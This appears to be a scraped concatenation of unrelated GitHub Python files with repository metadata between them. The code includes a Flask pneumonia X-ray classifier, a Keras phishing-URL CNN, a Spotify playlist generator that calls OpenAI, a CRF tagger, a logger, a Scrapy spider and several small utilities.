#writeJsonAccuracy(path,"normalize.json",entry, accuracy, entryTime, time)
media=[2,4,3,4]
dev=[3,4,5,4]
time="23sec"
#writeJsonNorma("Dataset\dataSetJson.json",media,dev,time)
"""
value=readFileDataset("Dataset\dataSetJson.json", "datasetLarge")
for i in value:
print(i)
key = "num_sample"
num = lengthDataset("Dataset\dataSetJson.json","datasetLarge",key)
print(num)
#ok distanza()
#
#arrayLogic()
"""
"""
parser = argparse.ArgumentParser( description = "Dataset Money")
parser.add_argument('--model', help = "Name of model [modello1 | modello2 | modello3]", type=str)
parser.add_argument('--v', help ="version" , type=int)
args = parser.parse_args()
required_together = ('model','v')
# args.b will be None if b is not provided
if not all([getattr(args,x) for x in required_together]):
raise RuntimeError("Cannot supply --model without --v")
else:
if args.model == "model1":
print("model ",args.model)
if args.v == 1:
print("version",args.v)
else:
print("Versione non riconoscita [1 | 2 | 3]")
print_to_stderr("Hello World")
else:
print("Modello non riconosciuto [modello1 | modello2 | modello3]")
print(type(sys.stderr))
"""
#sys.stderr.write("Error messages can go here\n")
acc="uffa"
f1score="score111"
precision="perfect"
recall="recallll"
time="142sec"
#addJsonModel("provaJson.json","1", acc ,f1score, precision, recall, time)
key="accuracy"
entry="accuracyTrain"
value="ValoreAcc"
#addValueJsonModel("provaJson.json","1", key ,entry, value)
key="time"
entry="timeTrain"
value="ValoreTime"
#addValueJsonModel("provaJson.json","1", key ,entry, value)
controlNormalize("Dataset") | rroosa/machineL | ProjectCode/file_prove.py | file_prove.py | py | 18,111 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "json.dump",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": ... |
34002187294 | import os
from app import app
from flask import Flask, flash, request, redirect, url_for, render_template
from werkzeug.utils import secure_filename
from pneumonia_prediction import predict
import tensorflow as tf
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])
os.environ["CUDA_VISIBLE_DEVICES"]="-1"
physical_devices = tf.config.list_physical_devices('CPU')
mariaunet = tf.keras.models.load_model('mariaunet')
def allowed_file(filename):
return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/')
def upload_form():
"""
display upload page
"""
return render_template('upload.html')
@app.route('/', methods=['POST'])
def upload_image():
"""
display image with the tensorflow model prediction
"""
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
if file.filename == '':
flash('No image selected for uploading')
return redirect(request.url)
elif file and allowed_file(file.filename):
filename = secure_filename(file.filename)
filepath = os.path.join(app.config['UPLOAD_FOLDER'], 'xray.jpg')
if os.path.exists(filepath):
os.remove(filepath)
file.save(filepath)
flash('Image successfully uploaded and displayed below')
predict(filepath, mariaunet)
return render_template('upload.html', filename='xray.jpg')
else:
flash('Allowed image types are -> png, jpg, jpeg')
return redirect(request.url)
@app.route('/display/<filename>')
def display_image(filename):
"""
display image
"""
return redirect(url_for('static', filename='uploads/' + filename), code=301)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8000)
| Nathanael-Mariaule/Pneumonia_Detection | flask_app/main.py | main.py | py | 1,710 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.environ",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "tensorflow.config.list_physical_devices",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "tensorflow.config",
"line_number": 13,
"usage_type": "attribute"
},
{
"ap... |
31062929205 |
from ..utils import Object
class ChatStatisticsMessageSenderInfo(Object):
"""
Contains statistics about messages sent by a user
Attributes:
ID (:obj:`str`): ``ChatStatisticsMessageSenderInfo``
Args:
user_id (:obj:`int`):
User identifier
sent_message_count (:obj:`int`):
Number of sent messages
average_character_count (:obj:`int`):
Average number of characters in sent messages; 0 if unknown
Returns:
ChatStatisticsMessageSenderInfo
Raises:
:class:`telegram.Error`
"""
ID = "chatStatisticsMessageSenderInfo"
def __init__(self, user_id, sent_message_count, average_character_count, **kwargs):
self.user_id = user_id # int
self.sent_message_count = sent_message_count # int
self.average_character_count = average_character_count # int
@staticmethod
def read(q: dict, *args) -> "ChatStatisticsMessageSenderInfo":
user_id = q.get('user_id')
sent_message_count = q.get('sent_message_count')
average_character_count = q.get('average_character_count')
return ChatStatisticsMessageSenderInfo(user_id, sent_message_count, average_character_count)
| iTeam-co/pytglib | pytglib/api/types/chat_statistics_message_sender_info.py | chat_statistics_message_sender_info.py | py | 1,244 | python | en | code | 20 | github-code | 36 | [
{
"api_name": "utils.Object",
"line_number": 6,
"usage_type": "name"
}
] |
40568587585 | from datetime import datetime
from typing import Optional
from dcs.mission import Mission
from game.weather.atmosphericconditions import AtmosphericConditions
from game.weather.clouds import Clouds
from game.weather.conditions import Conditions
from game.weather.fog import Fog
from game.weather.wind import WindConditions
class EnvironmentGenerator:
def __init__(
self, mission: Mission, conditions: Conditions, time: datetime
) -> None:
self.mission = mission
self.conditions = conditions
self.time = time
def set_atmospheric(self, atmospheric: AtmosphericConditions) -> None:
self.mission.weather.qnh = atmospheric.qnh.mm_hg
self.mission.weather.season_temperature = atmospheric.temperature_celsius
self.mission.weather.turbulence_at_ground = int(atmospheric.turbulence_per_10cm)
def set_clouds(self, clouds: Optional[Clouds]) -> None:
if clouds is None:
return
self.mission.weather.clouds_base = clouds.base
self.mission.weather.clouds_thickness = clouds.thickness
self.mission.weather.clouds_density = clouds.density
self.mission.weather.clouds_iprecptns = clouds.precipitation
self.mission.weather.clouds_preset = clouds.preset
def set_fog(self, fog: Optional[Fog]) -> None:
if fog is None:
return
self.mission.weather.fog_visibility = int(fog.visibility.meters)
self.mission.weather.fog_thickness = fog.thickness
def set_wind(self, wind: WindConditions) -> None:
self.mission.weather.wind_at_ground = wind.at_0m
self.mission.weather.wind_at_2000 = wind.at_2000m
self.mission.weather.wind_at_8000 = wind.at_8000m
def generate(self) -> None:
self.mission.start_time = self.time
self.set_atmospheric(self.conditions.weather.atmospheric)
self.set_clouds(self.conditions.weather.clouds)
self.set_fog(self.conditions.weather.fog)
self.set_wind(self.conditions.weather.wind)
| dcs-liberation/dcs_liberation | game/missiongenerator/environmentgenerator.py | environmentgenerator.py | py | 2,028 | python | en | code | 647 | github-code | 36 | [
{
"api_name": "dcs.mission.Mission",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "game.weather.conditions.Conditions",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
"line_number": 15,
"usage_type": "name"
},
{
"api_name... |
6245629363 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
ptest_args = []
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = []
def run(self):
import pytest
pytest.main(self.pytest_args)
setup(
name='PyIEProxy',
version='0.1.0',
description='Python IE Proxy Switch',
url='https://github.com/magichan-lab/pyieproxy',
author='Magichan',
author_email='magichan.lab@gmail.com',
maintainer='Magichan',
maintainer_email='magichan.lab@gmail.com',
license='MIT',
packages=find_packages(exclude=["*.tests"]),
install_requires=['wheel', 'requests'],
zip_safe=False,
entry_points={
'console_scripts': [
'ie-proxy = bin.command:main',
]},
extras_require={
'test': ['pytest-cov',
'pytest-pep8',
'coverage',
'pep8',
'pytest'],
'docs': ['sphinx'],
},
cmdclass={'test': PyTest},
)
| magichan-lab/PyIEProxy | setup.py | setup.py | py | 1,119 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "setuptools.command.test.test",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "setuptools.command.test.test.initialize_options",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "setuptools.command.test.test",
"line_number": 11,
"usage_type... |
72573548584 | import torch
import torchaudio
import glob
from torch.utils.data import Dataset
from utils.signal_processing import get_rnd_audio,extract_label_bat
from pandas import read_csv
from os import path
class raw_audio_dataset(Dataset):
def __init__(self,wav_dir, annotation_file, input_size, transform=None, target_transform=None):
"""
Initialises the audio dataset
"""
self.audio_files = read_csv(annotation_file)['File name']
self.label = read_csv(annotation_file)
self.transform = transform
self.target_transform = target_transform
self.input_size = input_size
self.wav_dir = wav_dir
def __len__(self):
"""
Returns the length of the dataset
"""
return len(self.audio_files)
def __getitem__(self,idx):
audio_path = path.join(self.wav_dir,self.audio_files[idx]) # .iloc[idx, 0] to get the correct audio_path
audio,b,e = get_rnd_audio(audio_path,self.input_size) # already a tensor
label = extract_label_bat(self.label.iloc[idx],b,e)
if self.transform:
audio = self.transform(audio) # which audio transforms are usually used?
if self.target_transform:
label = self.target_transform(label)
return audio,label
| ArthurZucker/PAMAI | datasets/raw_audio_dataset.py | raw_audio_dataset.py | py | 1,409 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path.join"... |
13058059804 | from string import printable
from keras.models import Model, load_model
from keras import regularizers
from keras.layers.core import Dense, Dropout, Lambda
from keras.layers import Input, ELU, Embedding, \
BatchNormalization, Convolution1D,concatenate
from keras.preprocessing import sequence
from keras.optimizers import Adam
from keras import backend as K
from keras.callbacks import CSVLogger
from utils import load_model, save_model
from keras.utils.vis_utils import plot_model
class CNNC:
def __init__(self, max_len=75, emb_dim=32, max_vocab_len=100, w_reg=regularizers.l2(1e-4)):
self.max_len = max_len
self.csv_logger = CSVLogger('CNN_log.csv', append=True, separator=';')
main_input = Input(shape=(max_len,), dtype='int32', name='main_input')
# Embedding layer
emb = Embedding(input_dim=max_vocab_len, output_dim=emb_dim, input_length=max_len,
W_regularizer=w_reg)(main_input)
emb = Dropout(0.25)(emb)
def sum_1d(X):
return K.sum(X, axis=1)
def get_conv_layer(emb, kernel_size=5, filters=256):
# Conv layer
conv = Convolution1D(kernel_size=kernel_size, filters=filters, \
border_mode='same')(emb)
conv = ELU()(conv)
conv = Lambda(sum_1d, output_shape=(filters,))(conv)
# conv = BatchNormalization(mode=0)(conv)
conv = Dropout(0.5)(conv)
return conv
# Multiple Conv Layers
# calling custom conv function from above
conv1 = get_conv_layer(emb, kernel_size=2, filters=256)
conv2 = get_conv_layer(emb, kernel_size=3, filters=256)
conv3 = get_conv_layer(emb, kernel_size=4, filters=256)
conv4 = get_conv_layer(emb, kernel_size=5, filters=256)
# Fully Connected Layers
merged = concatenate([conv1, conv2, conv3, conv4], axis=1)
hidden1 = Dense(1024)(merged)
hidden1 = ELU()(hidden1)
hidden1 = BatchNormalization(mode=0)(hidden1)
hidden1 = Dropout(0.5)(hidden1)
hidden2 = Dense(1024)(hidden1)
hidden2 = ELU()(hidden2)
hidden2 = BatchNormalization(mode=0)(hidden2)
hidden2 = Dropout(0.5)(hidden2)
# Output layer (last fully connected layer)
output = Dense(1, activation='sigmoid', name='output')(hidden2)
# Compile model and define optimizer
self.model = Model(input=[main_input], output=[output])
self.adam = Adam(lr=1e-4, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
self.model.compile(optimizer=self.adam, loss='binary_crossentropy', metrics=['accuracy'])
def save_model(self, fileModelJSON, fileWeights):
save_model(self.model, fileModelJSON, fileWeights)
def load_model(self, fileModelJSON, fileWeights):
self.model = load_model(fileModelJSON, fileWeights)
self.model.compile(optimizer=self.adam, loss='binary_crossentropy', metrics=['accuracy'])
def train_model(self, x_train, target_train, epochs=5, batch_size=32):
print("Training CNN model with " + str(epochs) + " epochs and batches of size " + str(batch_size))
self.model.fit(x_train, target_train, epochs=epochs, batch_size=batch_size, verbose=1, callbacks=[self.csv_logger])
def test_model(self, x_test, target_test):
print("testing CNN model")
return self.model.evaluate(x_test, target_test, verbose=1)
def predict(self, x_input):
url_int_tokens = [[printable.index(x) + 1 for x in x_input if x in printable]]
X = sequence.pad_sequences(url_int_tokens, maxlen=self.max_len)
p = self.model.predict(X, batch_size=1)
return "benign" if p < 0.5 else "malicious"
def export_plot(self):
plot_model(self.model, to_file='CNN.png') | larranaga/phishing-url-detection | CNNC.py | CNNC.py | py | 3,833 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "keras.regularizers.l2",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "keras.regularizers",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "keras.callbacks.CSVLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "ke... |
11316424779 | import json
import re
from pprint import pprint
with open('yc_feed.json') as data_file:
data = json.load(data_file)
i = 0
c = 0
for hundredmessages in data:
hm_plain_text = json.dumps(hundredmessages)
match = re.search(r'hackathon', hm_plain_text)
if match:
for msg in hundredmessages['data']:
msg_plain_text = json.dumps(msg)
match = re.search(r'hackathon', msg_plain_text)
if match:
c = c + 1
print('---')
print(c)
print(i)
print(msg['updated_time'])
print('###')
i = i + 1 | adamhipster/hackathon_website | python_fb_group_crawls/parse_fb_feed_data.py | parse_fb_feed_data.py | py | 530 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 15,
... |
43540671742 | """
"""
import numpy as np
from scipy.signal import find_peaks_cwt
from scipy.ndimage import gaussian_filter1d
def peak_finder(
curve:np.ndarray,
smoothing_factor:float=21.0,
)->np.ndarray:
"""
"""
min_width = int(curve.size/20)
max_width = int(curve.size/5)
resolution = int((max_width - min_width)/19)
peak_width = np.arange(min_width,max_width,resolution)
new_curve = gaussian_filter1d(curve,sigma=smoothing_factor)
indx = find_peaks_cwt(new_curve,peak_width)
return indx
| chriswilly/design_patterns | data_science/misc.py | misc.py | py | 528 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "numpy.ndarray",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.gaussian_filter1d",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "scipy.... |
27769169402 | import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
class XyjjSpider(CrawlSpider):
name = 'xyjj'
# allowed_domains = ['www.ccc.com']
start_urls = ['https://www.xyshjj.cn/list-1487-1489-0.html']
# page链接与其他链接相似度过高 rules不起作用,放弃。
rules = (
Rule(LinkExtractor(allow=r'">\d+</a>'), callback='parse_item', follow=True),
)
def parse_item(self, response):
item = {}
#item['domain_id'] = response.xpath('//input[@id="sid"]/@value').get()
#item['name'] = response.xpath('//div[@id="name"]').get()
#item['description'] = response.xpath('//div[@id="description"]').get()
ls = response.xpath('.//div[@class="article-list"]/div')
print('---------')
for i in ls:
url = i.xpath('./div/a/@href').get()
num = i.xpath('./div/a/text()').get()
print(url,' - ',num)
return item
| kshsky/PycharmProjects | dataFile/scrapy/ace/xxjjCrawl/xxjjCrawl/spiders/xyjj.py | xyjj.py | py | 992 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scrapy.spiders.CrawlSpider",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "scrapy.spiders.Rule",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "scrapy.linkextractors.LinkExtractor",
"line_number": 12,
"usage_type": "call"
}
] |
28068050082 | # 보물섬
# https://www.acmicpc.net/problem/2589
from collections import deque
import copy
def bfs(treasure_map, x, y, n, m) :
copy_map = copy.deepcopy(treasure_map)
dx = [-1, 1, 0, 0]
dy = [0, 0, -1, 1]
# 시작 지점과 탐색해나가는 지점과의 거리 저장 변수
count = 0
queue = deque([[x, y, count]])
copy_map[x][y] = 'W' # 시작 지점은 거쳐갔다는 표시
while queue :
x, y, cnt = queue.popleft()
count = cnt # 다음 지점의 좌표를 꺼낼 때마다 거리를 갱신한다.
for i in range(4) :
nx = x + dx[i]
ny = y + dy[i]
if nx < 0 or nx >= n or ny < 0 or ny >= m :
continue
if copy_map[nx][ny] == 'L' :
copy_map[nx][ny] = 'W'
queue.append([nx, ny, cnt + 1])
return count
def solution() :
n, m = map(int, input().split())
treasure_map = []
count_list = []
for _ in range(n) :
temp = list(input())
treasure_map.append(temp)
# 완전 탐색
for i in range(n) :
for j in range(m) :
if treasure_map[i][j] == 'L' :
count_list.append(bfs(treasure_map, i, j, n, m))
print(max(count_list))
solution()
| hwanginbeom/algorithm_study | 1.algorithm_question/6.BFS/131.BFS_wooseok.py | 131.BFS_wooseok.py | py | 1,279 | python | ko | code | 3 | github-code | 36 | [
{
"api_name": "copy.deepcopy",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 15,
"usage_type": "call"
}
] |
28801077672 | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 1 09:03:59 2018
@author: a001985
"""
import logging
import pathlib
#==========================================================================
def add_log(log_id=None, log_directory=None, log_level='DEBUG', on_screen=True, prefix='log_ekostat'):
"""
log_id: Id of the logger. Typically a UUID
log_directory: Directory to put the log files in. If not given no files are created.
log_level: Specify the log level.
on_screen: Set to True if you want to print to screen as well. Default is True.
prefix: Prefix to be added to the files.
--------------------------------------------------------------
Usage:
self._logger = logging.getLogger('......')
self._logger.debug('Debug message.')
self._logger.info('Info message.')
self._logger.warning('Warning message.')
self._logger.error('Error message.')
try: ...
except Exception as e:
self._logger.error('Exception: ' + str(e))
"""
# logging_format = '%(asctime)s\t%(filename)s\t%(funcName)s\t%(levelname)-10s : %(message)s'
logging_format = '%(asctime)s\t%(filename)s\t%(lineno)d\t%(funcName)s\t%(levelname)s\t%(message)s'
log_id_ext = '{}_{}'.format(prefix, log_id)
log = logging.getLogger(log_id_ext)
# Dont add an excisting logger
if len(log.handlers):
return False
print('='*100)
print(log_id)
print(log_directory)
print(prefix)
print('-'*100)
# Set debug log_level
level_mapping = {'DEBUG': logging.DEBUG,
'INFO': logging.INFO,
'WARNING': logging.WARNING,
'ERROR': logging.ERROR}
log_level = level_mapping.get(log_level.upper(), 'ERROR')
log.setLevel(log_level)
if log_directory:
dir_path = pathlib.Path(log_directory)
log_path = pathlib.Path(dir_path, '{}_{}.log'.format(prefix, log_id))
# Log directories.
if not dir_path.exists():
dir_path.mkdir(parents=True)
# Define rotation log files for internal log files.
try:
log_handler = logging.handlers.RotatingFileHandler(str(log_path),
maxBytes = 128*1024,
backupCount = 10)
log_handler.setFormatter(logging.Formatter(logging_format))
log_handler.setLevel(log_level)
log.addHandler(log_handler)
except Exception as e:
print('EKOSTAT logging: Failed to set up file logging: ' + str(e))
if on_screen:
try:
log_handler_screen = logging.StreamHandler()
log_handler_screen.setFormatter(logging.Formatter(logging_format))
log_handler_screen.setLevel(log_level)
log.addHandler(log_handler_screen)
except Exception as e:
print('EKOSTAT logging: Failed to set up screen logging: ' + str(e))
log.debug('')
log.debug('='*120)
log.debug('### Log added for log_id "{}" at locaton: {}'.format(log_id, str(log_path)))
log.debug('-'*120)
return True
#==========================================================================
def get_log(log_id):
"""
Return a logging object set to the given id.
"""
# print('¤'*100)
# print('¤'*100)
# print('¤'*100)
# print(logging.Logger.manager.loggerDict.keys())
# print('¤'*100)
for item in logging.Logger.manager.loggerDict.keys():
# print('{} _ {}'.format(log_id, item))
if log_id in item:
log_id = item
break
return logging.getLogger(log_id)
| ekostat/ekostat_calculator | core/logger.py | logger.py | py | 3,803 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "logging.INFO",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "logging.WARNIN... |
34848625388 | from __future__ import absolute_import
from __future__ import unicode_literals
__version__ = '0.5.0'
from markdown import Extension
from markdown.treeprocessors import Treeprocessor
class MDXReplaceImageSrcTreeprocessor(Treeprocessor):
def __init__(self, md, config):
super(MDXReplaceImageSrcTreeprocessor, self).__init__(md)
self.config = config
def run(self, root):
imgs = root.iter("img")
for image in imgs:
image.set("src", self.find_replace(image.attrib["src"]))
def find_replace(self, path):
return path.replace(self.config["find"], self.config["replace"])
class MDXReplaceImageSrcExtension(Extension):
def __init__(self, *args, **kwargs):
self.config = {
'find' : ["", "the string to find"],
'replace': ["", "the string to replace"],
}
super(MDXReplaceImageSrcExtension, self).__init__(*args, **kwargs)
def extendMarkdown(self, md, md_globals):
ReplaceImageSrc = MDXReplaceImageSrcTreeprocessor(md, self.getConfigs())
md.treeprocessors.add(
"ReplaceImageSrc",
ReplaceImageSrc,
"_end"
)
md.registerExtension(self)
def makeExtension(*args, **kwargs):
return MDXReplaceImageSrcExtension(*args, **kwargs)
| twardoch/markdown-steroids | mdx_steroids/replimgsrc.py | replimgsrc.py | py | 1,313 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "markdown.treeprocessors.Treeprocessor",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "markdown.Extension",
"line_number": 23,
"usage_type": "name"
}
] |
7045186193 | #!/usr/bin/python3
import argparse
import orbslam2
import os
import cv2
from time import sleep
def build_parser():
parser = argparse.ArgumentParser()
parser.add_argument('--vocab', type=str, required=True)
parser.add_argument('--config', type=str, required=True)
parser.add_argument('--seq', type=str, required=True)
return parser
def main(args):
sequence = []
with open(os.path.join(args.seq, 'rgb_left.txt'), 'r') as f_left, open(os.path.join(args.seq, 'rgb_right.txt'), 'r') as f_right:
for line_left, line_right in zip(f_left, f_right):
line_left, line_right = line_left.strip(), line_right.strip()
if line_left.startswith('#'):
continue
ts, img_left_path = line_left.split()
_, img_right_path = line_right.split()
sequence.append((float(ts), os.path.join(args.seq, img_left_path), os.path.join(args.seq, img_right_path)))
slam = orbslam2.System(args.vocab, args.config, orbslam2.Sensor.STEREO)
slam.set_use_viewer(True)
slam.initialize()
for ts, path_left, path_right in sequence:
img_left = cv2.imread(path_left)
img_right = cv2.imread(path_right)
slam.process_image_stereo(img_left, img_right, ts)
sleep(0.1)
save_trajectory(slam.get_trajectory_points(), 'trajectory.txt')
slam.shutdown()
def save_trajectory(trajectory, filename):
with open(filename, 'w') as traj_file:
traj_file.writelines('{time} {r00} {r01} {r02} {t0} {r10} {r11} {r12} {t1} {r20} {r21} {r22} {t2}\n'.format(
time=repr(t),
r00=repr(r00),
r01=repr(r01),
r02=repr(r02),
t0=repr(t0),
r10=repr(r10),
r11=repr(r11),
r12=repr(r12),
t1=repr(t1),
r20=repr(r20),
r21=repr(r21),
r22=repr(r22),
t2=repr(t2)
) for t, r00, r01, r02, t0, r10, r11, r12, t1, r20, r21, r22, t2 in trajectory)
if __name__ == '__main__':
parser = build_parser()
args = parser.parse_args()
main(args)
| cds-mipt/iprofihack | baselines/orbslam2/scripts/run_orbslam2_stereo.py | run_orbslam2_stereo.py | py | 2,114 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
... |
33675586325 | #!/usr/bin/env python
# coding: utf-8
# In[44]:
import re
import pickle
from sklearn_crfsuite import CRF
from sklearn_crfsuite import metrics
from sklearn_crfsuite import scorers
# In[45]:
def parse(input_):
tags = []
lexicons = []
lemma = []
pos= []
sentences = input_.split("\n\n")
for sentence in sentences:
words = sentence.split("\n")
for word in words:
tokens = word.split("\t")
tags.append(tokens[7])
lexicons.append(tokens[1])
pos.append(tokens[4])
lemma.append(tokens[2])
lexicons.append("</s>")
tags.append("</s>")
lemma.append("</s>")
pos.append("</s>")
lexicons.pop()
return lexicons, tags, pos, lemma
# In[46]:
def features(sentence, index, pos_sentence):
# print(sentence[index], pos_sentence[index])
### sentence is of the form [w1,w2,w3,..], index is the position of the word in the sentence
return {
'word':sentence[index],
'is_first_word': int(index==0),
'is_last_word':int(index==len(sentence)-1),
'prev_word':'' if index==0 else sentence[index-1],
'next_word':'' if index==len(sentence)-1 else sentence[index+1],
'prev_pre_word':'' if index==0 or index==1 else sentence[index-2],
'next_next_word':'' if index==len(sentence)-1 or index==len(sentence)-2 else sentence[index+2],
'is_numeric':int(sentence[index].isdigit()),
'is_alphanumeric': int(bool((re.match('^(?=.*[0-9]$)(?=.*[a-zA-Z])',sentence[index])))),
'pos': pos_sentence[index]
}
# In[47]:
def prepareData(input):
lexicons, tags, pos, lemma = parse(input)
# print(len(lexicons))
sentences = ' '.join(lexicons).split(' </s> ')
sentences_pos = ' '.join(pos).split(' </s> ')
sentences_tags = ' '.join(tags).split(' </s> ')
# print(len(sentences))
X=[]
y=[]
for sentenceid, sentence in enumerate(sentences):
words = sentence.split(' ')
pos = sentences_pos[sentenceid].split(' ')
X.append([features(words, index, pos) for index in range(len(words))])
for sentence_tag in sentences_tags:
words_tag = sentence.split(' ')
y.append(words_tag)
return X, y
# POS, Chunck, Lemma, Case Marking
# In[48]:
def train_CRF(X_train,y_train):
crf = CRF(
algorithm='lbfgs',
c1=0.01,
c2=0.1,
max_iterations=100,
all_possible_transitions=True
)
crf.fit(X_train, y_train)
pickle.dump(crf, open("./annCorra_crf_pos_model", 'wb'))
# In[49]:
# print(X_train[0])
# print(y_train)
# In[50]:
def test_dev_data(X_test,y_test):
y_pred=crf.predict(X_test)
print("F1 score on Test Data ")
print(metrics.flat_f1_score(y_test, y_pred,average='weighted',labels=crf.classes_))
print("F score on Training Data ")
y_pred_train=crf.predict(X_train)
metrics.flat_f1_score(y_train, y_pred_train,average='weighted',labels=crf.classes_)
### Look at class wise score
print(metrics.flat_classification_report(
y_test, y_pred, labels=crf.classes_, digits=3
))
# In[51]:
train_file = open('./final_train.txt', 'r', encoding="utf-8")
traininput = train_file.read()
# dev_file = open('./final_dev.txt', 'r', encoding="utf-8")
# devinput = dev_file.read()
# In[52]:
X_train,y_train = prepareData(traininput)
# In[53]:
train_CRF(X_train, y_train)
# In[54]:
# X_test,y_test = prepareData(devinput)
# In[32]:
# test_dev_data(X_test, y_test)
# In[ ]:
# In[ ]:
| hellomasaya/linguistics-data | assgn4/annCorraCRFModel.py | annCorraCRFModel.py | py | 3,577 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.match",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "sklearn_crfsuite.CRF",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "pickle.dump",
"line_number": 96,
"usage_type": "call"
},
{
"api_name": "sklearn_crfsuite.metrics.fl... |
72582014823 | import spotipy
import openai
import json
import argparse
import datetime
from dotenv import load_dotenv
import os
load_dotenv()
openai.api_key = os.environ.get("OPENAI_API_KEY")
parser = argparse.ArgumentParser(description="Enkelt commandline verktøy")
parser.add_argument("-p", type=str, default="AI genert liste",help="Prompten som beskriver playlisten")
parser.add_argument("-n", type=int, default=10 ,help="Hvor mange sanger ønsker du i playlisten")
args = parser.parse_args()
def get_playlist(prompt, count=10):
example_json = """
[
{"song": "Someone Like You", "artist": "Adele"},
{"song": "Hurt", "artist": "Johnny Cash"},
{"song": "Fix You", "artist": "Coldplay"},
{"song": "Nothing Compares 2 U", "artist": "Sinead O'Connor"},
{"song": "All By Myself", "artist": "Celine Dion"},
{"song": "Tears in Heaven", "artist": "Eric Clapton"},
{"song": "My Immortal", "artist": "Evanescence"},
{"song": "I Can't Make You Love Me", "artist": "Bonnie Raitt"},
{"song": "Everybody Hurts", "artist": "R.E.M."},
{"song": "Mad World", "artist": "Gary Jules"}
]
"""
messages = [
{"role": "system", "content": """You are a helpfull playlist generating assistant.
You should generate a list of songs and their artists accordning to a text prompt.
You should retur it as a json array, where each element follows this format: {"song": >song_title>, "artist": <artist_name>}
"""
},
{"role": "user", "content": """Generate a playlist of 10 songs based on this prompt: super super sad songs
"""
},
{"role": "assistant", "content": example_json
},
{"role": "user", "content": f"Generate a playlist of {count} songs based on this prompt: {prompt}"
},
]
response = openai.ChatCompletion.create(
messages=messages,
model="gpt-3.5-turbo",
max_tokens=400,
)
playlist = json.loads(response["choices"][0]["message"]["content"])
return (playlist)
playlist = get_playlist(args.p, args.n)
## JSON format for artists and songs
print(playlist)
sp = spotipy.Spotify(
auth_manager=spotipy.SpotifyOAuth(
client_id=os.environ.get("SPOTIFY_CLIENT_ID"),
client_secret=os.environ.get("SPOTIFY_CLIENT_SECRET"),
redirect_uri="http://localhost:8888/",
scope="playlist-modify-private"
)
)
current_user = sp.current_user()
track_ids = []
assert current_user is not None
for item in playlist:
artist, song = item["artist"], item["song"]
query = f"{song} {artist}"
search_results = sp.search(q=query, type="track", limit=10)
track_ids.append(search_results["tracks"]["items"][0]["id"])
playlist_prompt = args.p
created_playlist = sp.user_playlist_create(
current_user["id"],
public=False,
name=f"{'AI - '} {playlist_prompt} {datetime.datetime.now().strftime('%c')}"
)
sp.user_playlist_add_tracks(
current_user["id"],
created_playlist["id"],
track_ids
) | donadelicc/MySpotify | utils/local_app.py | local_app.py | py | 3,072 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "openai.api_key",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.environ",
... |
30910231452 | import sys
from PyQt5 import uic
from PyQt5.QtGui import QPainter, QColor
from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QMainWindow
from random import randint
class MyWidget(QMainWindow):
def __init__(self):
super().__init__()
